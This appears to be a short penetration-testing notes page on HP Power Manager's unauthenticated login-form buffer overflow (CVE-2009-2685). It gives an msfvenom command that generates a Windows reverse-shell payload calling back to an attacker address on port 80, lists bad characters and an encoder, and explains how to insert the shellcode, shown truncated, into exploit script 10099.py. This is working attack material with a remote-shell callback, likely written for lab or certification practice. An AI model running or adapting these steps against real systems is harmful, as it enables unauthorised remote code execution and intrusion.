HP Power Manager

HP Power Manager is a Windows-based system management application developed by Hewlett-Packard that provides centralized control and monitoring of power consumption across HP servers and client devices. It allows administrators to optimize energy usage, enforce power policies, and schedule power-on/power-off or sleep/hibernate states for devices within an enterprise environment. The software integrates with HP management consoles and supports reporting on historical and real-time power metrics, enabling organizations to reduce energy costs and improve operational efficiency.

Unauthenticated RCE

HP Power Manager is affected by a stack-based buffer overflow in the login form of the management web server (CVE-2009-2685). An unauthenticated remote attacker can exploit this vulnerability by sending a specially crafted value in the Login parameter, which allows arbitrary code execution in the context of the web server process. A working Python-based PoC is available:

# Generate the payload
msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=192.168.45.241 LPORT=80 -e x86/alpha_mixed -f c

Insert the shellcode into the script:

10099.py

<SNIP>

# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\xeb\...<SNIP>...\x5a")

<SNIP>